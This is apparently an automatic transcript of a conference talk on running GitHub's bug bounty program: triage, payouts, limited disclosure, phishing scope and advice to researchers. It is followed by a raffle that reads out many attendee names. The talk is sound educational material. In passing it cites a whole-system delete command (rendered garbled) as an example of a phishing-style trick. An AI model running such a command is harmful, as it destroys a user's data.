any reports that come in just to make sure they pass a sanity check that's relevant sort of what you'd expect go through reproduce those make sure they're actually reproducible so that we can continue an investigation of them validate that there's something we care about that we want to pursue further sometimes if there's any ambiguity in that we'll pull in the engineering teams or product teams just to make sure that everyone's got a good picture of it from there we'll fix it simple point and then pay things out so we'll talk a little bit about the payouts in different ways the programs do it our current setup is we'll pay out whenever things get fixed which could be a couple days could be a couple weeks could be a couple months but that way we're ensuring that our customers are actually protected by the time any information gets out there in the world so when we get reports the key thing we want to do is figure out what's actually going on so we want to understand what the actual vulnerability for these things are so not just whether or not it is something we care about from a security we actually understand the overall scope for it quite often when I've looked at stuff in bounty programs we'll see reports come in it's a little bit unqueer and you may have wildly varying severity wildly varying severities that's a tongue twister as they evolve over time so we want to try to get that in advance so that when we push this off to our engineering teams to actually formally fix it and continue our investigations with our our cert teams and whatnot that we can prioritize that properly next thing is can we take this and actually increase the impact for it does this advance other attacks are there other things we need to focus on for this rather than just whatever has been reported to us I think the key takeaway for this with our program and I think many others is it's not necessarily the job of us on the bounty side to increase that impact we just want to understand it but if you submit reports and it looks like it's reasonably minimal that's sort of on you as the reporter to demonstrate what that impact is to make sure the severity is clearly represented in terms of a payout that said we do argue diligence on that nonetheless next thing is understanding the trends we're seeing overall and this is both for our program other programs security world in general we want to understand both what we're seeing across overall ecosystem so if there's new vulnerabilities or popping up with rails or git we want to understand that pretty well to begin with so we can be prepared for it and sort of get out ahead of that and the other part of that is to retrospectively look at reports we're getting so take that data feed it back into our overall SDLC and make sure that we can say hey we've got a lot of problems in this particular product area or we're seeing this type of problem persist across many different product areas so let's actually focus on that moving forward as we go through our overall life cycle for it and the last part of this I mentioned earlier we collaborate with our CERT teams a lot we want to understand what the blast radius for these things are you know is there a user or customer impact to it or is it just you know sort of a security software bug that hasn't been exploited so as part of understanding that overall impact we will go through work with our CERT teams both internal and customer facing for that to either send out notifications if we need to or at least make sure we understand the depth of what's happened there I've been talking about affecting users and customers and a big part of that is that we have two different product streams for this we run a SaaS offering as well as a non-prem product so with GitHub Enterprise Server we are doing releases every couple of weeks for it major release every quarter but there are different concepts that come with this so we're effectively shipping the same code for both if you ever download GitHub Enterprise Server you can if you're crafty enough basically get a lot of the source code out of that but the fun part of that is that we can ship fixes really quickly on github.com it could be hours, it could be a couple of days but for shipping something on-prem we have to go through a full release cycle for that it could be a few weeks if we miss back port deadlines that can get extended out a little bit further but the key takeaway here is if something affects one it probably affects both so when we go through and look at fixes and look at payouts and disclosures we want to make sure we've got full coverage with that one too many things here so again all this needs to get done to all the investigations we've been talking about if we need to cut CBEs we want to make sure the researchers are properly credited for that and if we are going to go forward with disclosure which we're currently doing in a limited standpoint for anything that does lead to a CBE we want to make sure again that there is full coverage for that, fixes are available for customers both for github.com and github enterprise server so from there figuring out payouts and touching on this a little bit more and figuring out severity rankings whether or not you want to use CVSS or some other framework for it or if you want to do things yourself so we have opted to use our own threat model for this we think we have a pretty good understanding of how things affect us and our customers rather than a genericized approach like CVSS and the key part of that is that as we figure out these things in our ecosystem we want to understand we want to understand the actual risk for it so we've certainly seen some cases of vulnerability that you plug into CVSS and it's a 9.5 or something but when you actually apply it to exploitability and impact for something like a SaaS offering specifically for github.com it may be significantly reduced so we'll use this as a sanity check certainly if there's tiebreaker stuff as we go through and deliberate things as a team we can use this as a sort of a sanity check or a reference point for it once we've got through all that we'll figure out how to not screw up disclosure this is much trickier than it may sound if you haven't had to do this before I've been on the receiving end of it from a bug I can't overstate how tricky this actually is to line up one of the first things I'll note because there have been some really good examples of this in the Twitterverse lately is that the more you work in public for a bug bounty program or really anything I suppose the more open your staff and company are to harassment and scrutiny there's a great example with bug crowd a couple days ago you can poke through Twitter and I'm sure you'll find it but overall cracks will begin to show quite quickly for it so you want to make sure that you are putting on your best face for it you understand what the implications of all this stuff are and how it's going to affect the rest of the ecosystem as well certainly if there are other products out there that have similar technologies underlying them make sure you have opportunities to collaborate before things get fully disclosed so right now we are doing limited disclosure which is sort of a summary for reports and then a researcher provided summary for it as well along with severity payout and timelines but not necessarily all of the back and forth and not the original report that has the exploitation details some programs opt for what would be called full disclosure with Hacker 1 which is absolutely everything that goes into it so that's a we do want to find a way to share as much as is feasible for this I talked about some of that talked about limited disclosure with Hacker 1 every platform has some sort of tool for this is not specific to them but the key thing is everyone of course always wants more right the more details you have out there for this stuff the easier it is to hunt on equivalent programs or basically contribute back to the overall bug bounty world so we are trying to move more towards more disclosure whether it be through full disclosure or just more reports in general rather than just CBEs so we are going to see how that plays out over the coming time but certainly if you've got experience working with this I'd love to hear from you and chat about the pros and cons so feel free to come up and chase me down after we're done here but shifting gears a little bit into some of the other areas that are a little fishy for bug bounty programs is of course fishing this is something that's out of scope for virtually every program out there we're no different for that but it doesn't mean it should be just flat out ignored whenever you're looking at fishing stuff the key thing is to understand the difference between a mechanism that might enable fishing and one that requires fishing so if you look like a CLI tool or really anything if you run a command and you expect it to do something it should do that thing if you run a command and it does something else because some very very plausible legitimate scenario has taken place like another file in the right path location and it now does something malicious that's something you can defend against and that's where we look at this as a defense in depth opportunity we want to find a way to improve that and it's a safe guard flip side is if somebody says hey just run our MRF slash no preserve route like that's a you problem that's not something you can necessarily protect against technically we've approached this and we've seen a few other programs do it as well as this idea of thank you payouts so it's something that doesn't necessarily register on what we consider low severity but it's still something we want to acknowledge it this is a good finding but not necessarily a security threat we are going to take some sort of action on this a small award whether it be swag or you know a smaller cash award than our minimums would normally be. And really the takeaway from this is Murphy's law right if there is a way for somebody to do something wrong they're gonna do it wrong so if you can have secure defaults it's always always preferable and that's certainly not to suggest that we're perfect nobody in the world is for this stuff but something to strive towards and really why we've adopted this type of setup. Another question that comes up quite a bit usually from from sponsors for this is why would you implement a bounty program instead of spending that money on red teaming or external pen testing or more lawyers right and the biggest thing is it's it's not an instead of this is an in addition to when we talk about defense in depth this is one part of a much bigger picture for all of it and the way I like to describe it despite this having been thoroughly disproven I think by science at this point is if you can have a thousand monkeys riding Shakespeare you can have a thousand security researchers finding some gnarly bugs you're opening things up to a world of eyes that otherwise might not be there and if you can incentivize that through ideally having a very good responsive transparent program or having a lot of money or both it makes that a lot easier. So one of the other parts of this in terms of having eyes on it and fitting the best of both worlds here is looking at opportunities like invite only programs BIP programs live hacking events you know a lot of this does come with budget but there are ways to get around that in many cases but what this lets you do is attract very specific groups of folks to look at very specific things so where it may be a lot of back and forth to engage with another company to do a deep dive on you know code spaces for example from the last presentation if we can say hey we want to get 30 people in a room as part of a live hacking event and here's some extra cash bonuses if you're able to find you know I doors or crits or something on code spaces we now have an opportunity to do that and people are flocking to come into those events and even if they don't normally work on our program or maybe even on the platform there's still possibilities to pull them in so that is one place where we're working with somebody like hacker one or bug crowd or any other platforms can be super helpful for it but for us specifically between invite only programs where we've found folks who contribute frequently high quality stuff to our program or live hacking events we've had great success for this shifting gears to internal and I say internal internal to me bounty as a way to learn I think this is something that's a little bit underrated as an entry point into the security world similar to my you know I mentioned I have a background in support this is a great way to get new perspectives on things if you have a background in engineering you're going to be using all of those skills but you're now putting a security focus on it if you have a human facing background you're now taking that because you're still doing that and building that security expertise on top of it and if you're already in security you're now building external facing expertise where you have to be able to communicate these things back and forth and really negotiate do a lot of negotiations with internal groups that are part of it if you're coming in reasonably new to the the overall security or engineering world is you're getting access to a lot of stuff that you otherwise wouldn't have access to I've worked at and with companies where it's unheard of for support folks or really any customer facing folks to have access to source code for a product certainly not the case for us but you know when when you're working with these problems having to debug them having to understand severity do investigations you're getting your hands pretty deep in into these things and working working with the experts in in these different areas similarly for understanding systems architecture you know I think there were some some great talks earlier when you're going through and taking a look at a vulnerability it's it's almost never hey I this API is vulnerable it's this API is vulnerable because the message that's going to that is coming through three or four other places and we don't have full lineage on it you know whether it be privacy stuff or deserialization vulnerabilities whatever there are many many ways to dig into this and lastly looking at engagement with other teams and companies you know I've certainly had no shortage of working with different engineering teams to dig into this stuff external vendors and whatnot and I think that's true for for most stuff in in this world and I think I look at that as a big plus that certainly comes with some some fun sometimes so moving into the what I call the picture slides for this the takeaways for folks this one is is for anyone who's looking to submit bounty reports again this is to us or or anyone else there are a few key things I'd recommend the first is treat your bounty reports as as UDP traffic fire and forget send them off if it gets looked at that's fantastic if you're going through and doing constant bumping on reports if you've been on the receiving end of that where somebody's falling up by email every six hours you know it's not a great way to really get attention if you're looking to bump stuff once a week or so that's that's usually pretty good but in general what I've seen especially from the folks who are pulling in a lot of money they will put in very high quality reports send them off and let them be if they need to follow up they will and if they don't they won't next is to have a pretty good understanding of what you're reporting there's a whole lot of cases where you know if there's smoke there's fire so if you see something say something absolutely nothing wrong with that if you are looking at submitting stuff and you think there's going to be a bit of back and forth around it it's really helpful to be prepared for that to have an understanding of what you're looking at key example I'll give here with GitHub is we have an import function that can pull stuff in from other source code repository providers or even on-prem stuff and we get reports probably about once a week talking about SSRF vulnerabilities with it because you can provide a URL and then GitHub reaches out to that that's exactly what it's designed to do so understanding that context can be can be quite helpful both for you making sure you're not wasting your time but once a report goes in you know if you really need to push something through you you can do that next up is when you're looking at submitting with any program you know understand the scope that they have understand the rules they have around disclosure where information needs to go nothing is worse than having a report come in with some pretty gross stuff and somebody then realizes that it's in you know paste bin somewhere else that they've tried to include stuff so not not a great look for anybody at that point because now you have a security incident in addition to a bug other part of this is you know if you're looking to work with programs long-term we have a lot of folks who come back I think for a lot of bounty programs out there there's a lot of people who have a lot of information about how to repeat I say repeat customers repeat submitters it's really helpful to understand that you know of course there are humans on both sides of this relationship so if there are ways to sort of understand how people tend to approach reports on both sides if there's stuff that is generally asked for that maybe not part of the program whether it be video POCs or scripts whatever if you can come armed with that it's going to save everyone a lot of time and generally builds things up from there and the last one which I think is the most important part of the program is to be able to create avoid bullshit you know we talked earlier about understanding or at least having a decent understanding of what you're submitting if you're sending stuff in just to say you've submitted bounty reports it's not particularly helpful a lot of programs will actively punish this not and whether or not that's up to the program owners is a different story I would generally encourage folks to be lenient with closure states for reports but looking at what you have to have to be able to submit reports so if you wind up getting dinged for sending stuff in through a program that's maybe a bit less generous around those closure states you can wind up just nuking your career before it starts on that. Shifting over to folks working on a bounty program because I know there were a few here which is nice the key thing here is to remember that when researchers doing well in your program you know when they win you win if you can continue to incentivize folks to come back and make it worth their time and worth your own time to deal with that it's good for everybody at that point. And next up talking about closure states and what not is the more you can help folks to grow especially if you're working with a program that gets a lot of let's say less experienced folks submitting reports if there are opportunities to contribute back through those reports that's a great way to do it. I mentioned punitive closure states with some of these platforms we use something called the informative status on Hacker 1 which basically is no reputation hit if you submit a report and we say hey it's invalid whatever a default might be to put that as not applicable which will be a reputation hit we will tend to opt for informative for it which is no reputation hit and we always try to give a sort of a quick explanation as to why that's the case so if you send something in with that SSRF scenario I talked about earlier we're actually going to provide an explanation of why we don't consider it to be a vulnerability or a problem in general so again if you can keep folks coming back through that way keep educating them everyone sort of comes out better there. As a person working on the program as well do your own research around this understand the vulnerable surface that you have understand the trends that are out there understand the attack vectors it's going to speed things up for everyone if you can get reports coming in and we know what to look for as soon as those land that can be incredibly helpful and the last point on here and I can't stress this enough is be professional similar to being on the submitting side and not wanting to try to baffle people with bullshit that goes two ways you are I say this being on stage talking about it you are the face of your company just like working in support or working in sales or working at the desk at a store if you say something or do something that represents the company almost more than it represents you so if you are you know if I come up here and say something that's just wildly off color it's not necessarily Logan said this it's GitHub said this so keep that in mind. And last up this is for folks who are actually running programs because I know there are a couple here thank you for what you do you make this possible for all of us but biggest thing here is you know you utilize your program as a way to refine your program and to work with your broader security teams for this stuff take a look at where your reports are coming in what types of reports you're getting and use those to refine your operations your secure SDLC all of that and certainly and this goes for everyone you know try to be as honest and fair as you can for things if there are scenarios where your program has had a screw up or you know maybe you've closed a report only to find out six months later that it was actually valid do the right thing look for opportunities to reopen those communicate with the original researcher make things right as much as you can it doesn't take long to go on to bug bounty forums or something and find some horror stories about programs that have absolutely botched this I don't don't know and I don't think our track record is absolutely perfect I don't think anybody's is but the more you can strive to go in this direction the better. Similarly looking for opportunities to collaborate internally the more you can reduce the friction for engineering teams wanting to be in scope for your program the easier it's going to be to run because you'll have a very clear definition of your scope as well it's not going to be a case where you have to constantly go back and forth to understand if something's in scope if your default is that it is in scope and that you have ways to then reach out to those teams. Another part of this as well is to look at opportunities to bring things in looking back at invite only programs VIP events if there are ways you can build that into a beta for it's something rolls out if it's right before release if you can feature flag folks into that so they can start hacking on it before it's necessarily going to be out there in the wild affecting customers one that's a great perk for VIPs because they know they have limited competition for it but two it also lets you ship a more secure product when you get to that point. We already talked about this understand trends technical and non-technical if there's stuff that's going on out there whether it be log for J or the next one if you can help prepare your company and your teams for responses to that making sure you've got things in place to be able to follow up quickly it's super helpful and yeah on the non-technical side as well understand if there are big spam issues or something that are coming in for your platform or your program again if there's ways to streamline that just reduce stress for everyone. And lastly look for opportunities to grow your program and attract researchers if you are brand new into this space building a new program start out small look to build up from there but again be very clear on your scope so there's not a lot of confusion for folks and certainly once you have folks coming in try to treat them as well as you can so they keep coming back and keep finding cool stuff for you. If there are opportunities to do live hacking events or promotions whatever through bonuses for new features things like that certainly encouraged the feedback we've gotten from folks working on our program and other people we've spoken to with other programs is really the more you can sort of target things, hype things up and deliver on them the better off everyone's going to be for it. So with that hopefully everyone got pictures of the picture slides that is wrapping things up if you do have any questions around any bounty stuff come find me otherwise I'll probably be at the bar at the end of it you can find me on any of the wonderful antisocial things here but otherwise thank you and good luck with the raffle. So we're going to take a five minute break just to set it up and we're going to go ahead with the raffle and this is it for Norsak 2023. Well the conference the CTF starts. Okay hello okay so we're going to raffle some stuff yeah very exciting so the way this is going to work is we're going to read out names so if you are here you're probably on the list and we're going to ask you if your name is called out just come up here and it is first come first serve you get to pick what you want to take in addition to the nice gifts there's also these stacks of books in the back if anyone wants to learn visual C sharp 2008 please take it so any of the stuff that's in the pile in the back just take it if you feel like taking it otherwise eventually it's going to go in the recycling so it's just here okay do you want to announce the first few winners sure yeah just so we have a bunch of stuff we have a flipper zero we have some letterman we have no storage books those are new those are we have some Yubi Keys and we have a bunch of stuff so to start out we have Marc Olivier la voix one time two time Craig Duncan all right it's going to be fast Guillaume F lots of opportunities there pick your poison no pressure we also have Norbert Raskovi Hervé Bariel Flo did we already do Will Summerhill Will Summerhill okay Simran Aurora Benjamin Chambon Mathieu Boswell Leanne Dutille okay I saw her going once going twice Tufik Waganuni I am very sorry if I butchered that Jawad Nasser Brian Wright François de Varene is there a question if you're not there we all know Leanne but sorry Leanne Pierre Francois Rémi Langevin V.K. Tran Todd Stavely Louis Lavoix-Coron James Lee so is this the list from the CTF Simon Charrette Gary Pascal or Gary Robert Whitney Benoit Renault Galina Shellest Gabrielle Ruyard Felix Charrette Connor Laidlaw so Simon we're going to need new names Asha Kourgourou Asha Kourgourou Shivashankar William Adam Grenier Michael Nadeau Max Délage Marie-Eve Bergeron Touranjo Yannick Vielle Mathieu Chouinard Maxime Leblanc Rawan Morshed Felix Contant Can you do the next one? Next one I'm not going to be so lucky on Ashia Hanim Ayasur Guillaume Lacasse Emmanuel Roy Dubreuil Clinton Leg Etienne Ducharm Not scripted Where are we? Yifan John Guylain Carrier Nicolas Lemieux Did you say Nicolas Lemieux? Bradley Callender Marc-Antré Boulet Xavier Pépin Tristan Dostaller Gael Sylvain Francis Venne Tharesh Sharma Martin Proa Eti Shirley-Anne Pagé I saw it too early but... Again Guillaume F Francis Gravel St-Pierre Brandon Borodash Khaled Bra Jessica Williams Michael Laet All of you can take the prize Alexandre Provost Alexandre Laforêt Godot Jonathan Roy It's good that we don't have names that are memes Vincent Theriot Iba Moumenet Tristan Binstman Alexandre Cotessir Kevin Lagasse Deborah Roulot Genmey Fan Alexandre Ogorodnikov Eric Christensen Felix Boulien Felix, Felix, Felix! Oh no, I lost Philippe Guirégoire Richard Vannet Alain Zakour Gary Pascoe Maté Engel Or Maté Angel Samuel Aubert Woo! Michael The Wolf Damien Artoin Dario Martin Silva Guy Comtois Denis Douzgun probably butchered it Stéphane L'Esperance Orion Mock Patrick Bertiom Réda Baidoun Ok Nicolas Loic Fortin Simon Charret Jim Kearney Anais Yapobi Kevyn Mock This is it Olivier Toupin Guy Comtois Kim Schwanier Sarah Morshed Nathan Grant Clayton Smith Mitch Taylor Iba Moumenet Iba Moumenet Iba Moumenet Iba Moumenet Iba Moumenet Nathan Grant Clayton Smith Mitch Taylor Mart Sara Nankambu Chungku Lieberman Berg Alain Yamin Philippe Paré Parvin Ramizani Sébastien Bordage Are you still awake? Now I don't know where... Michael Hopper Balouan Ngouyen Norbert Labé Yinguo Alexander Amstoy Mathieu Chouinard Shane Schuster Someone Julie Petnaud Vincent Drolet Lost Too much traffic Eunice Boulphred I don't know if I pronounced that accurately Nicolas Lemieux Michael Nadeau Ahmed Abdel Wahab Jasmin Paré Philippe Crégoire Liam Rafaille Jonathan Brunette Etienne Gervais Nicolas Tremblay Stéphane Pelletier-Lamotte Neil Yousouk Charles Terrien Jack McCracken Oh okay! Orion Mock again Tristan Beansman again Sarah Hughes Henri Lebeau Dani Lafrenière Marc Alexandre Montpa Thomas Heller Anlisa de Forêt Artemis Livingstone Patrick David Patrick Davidson Tremblay Eric Tahan Alexandra Stilaire And next Do you want a prize Flo? I'm okay, I'm okay You want to learn SQLite? Oracle We can loop around Did we just get another one? We're out of names, do we want a... Okay Alright, so we're going to try something else We're going to try to throw some things Not the books So the book is going to be a later So you can come and not make a mess, please and take a book No Fight, Allowed Please So are you guys ready for receiving things? So please That's fun So I don't know how good I am at throwing Oh, sorry Yeah Okay, so that's not good That's not going to happen This is not amazing for public safety Yeah Okay We're going to trivia at this point What does CISSP stand for? We have an answer We have a polite person who raised their hand Good I didn't hear, so Honor system There's another Systems and security I don't even know the answer That's good, alright Come claim another prize Yeah Do we have another acronym? There are many acronyms in security Yeah I think Okay We're calling it a day This has been fun or not There's some books to come and get So Please So the laptop